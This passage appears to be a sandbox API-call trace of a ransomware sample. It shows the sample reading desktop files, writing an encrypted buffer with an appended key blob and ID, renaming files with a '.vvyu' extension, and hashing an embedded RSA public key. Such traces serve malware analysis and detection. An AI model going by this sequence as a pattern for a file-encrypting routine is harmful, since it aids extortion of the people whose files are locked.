HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.719] GetCurrentThreadId () returned 0x264 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce5c0 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.720] GetCurrentThreadId () returned 0x264 [0183.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7b0 [0183.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7c8 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7e0 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e7b0 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7b0 | out: hHeap=0x6a0000) returned 1 [0183.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30f40 | out: hHeap=0x6a0000) returned 1 [0183.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.740] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xa00c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xa00c, lpOverlapped=0x0) returned 1 [0183.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.741] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa011, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.741] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.743] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.743] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.744] CloseHandle (hObject=0x584) returned 1 [0183.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0183.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0183.745] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\fjAnz4 q_5C_daasZw.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\fjanz4 q_5c_daaszw.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\fjAnz4 q_5C_daasZw.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\fjanz4 q_5c_daaszw.ots.vvyu")) returned 1 [0183.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.748] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0183.751] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5920ba50, ftCreationTime.dwHighDateTime=0x1d898d6, ftLastAccessTime.dwLowDateTime=0x1c2f4310, ftLastAccessTime.dwHighDateTime=0x1d8a0af, ftLastWriteTime.dwLowDateTime=0x1c2f4310, ftLastWriteTime.dwHighDateTime=0x1d8a0af, nFileSizeHigh=0x0, nFileSizeLow=0xccca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FMtIy2J60xYs_lff.png", cAlternateFileName="FMTIY2~1.PNG")) returned 1 [0183.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f40 [0183.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30f40 | out: hHeap=0x6a0000) returned 1 [0183.751] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\FMtIy2J60xYs_lff.png") returned=".png" [0183.751] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\FMtIy2J60xYs_lff.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\fmtiy2j60xys_lff.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.751] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=52426) returned 1 [0183.751] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.754] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcca4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.754] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.755] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.755] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xccca, lpOverlapped=0x0) returned 1 [0183.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.756] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.756] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.757] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.757] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.757] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.757] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.757] GetLastError () returned 0x0 [0183.758] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.758] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.758] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.758] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.758] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xccd0) returned 0x2d43778 [0183.759] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f40 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e780 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30f88 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e798 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.760] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7c8 | out: hHeap=0x6a0000) returned 1 [0183.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.760] 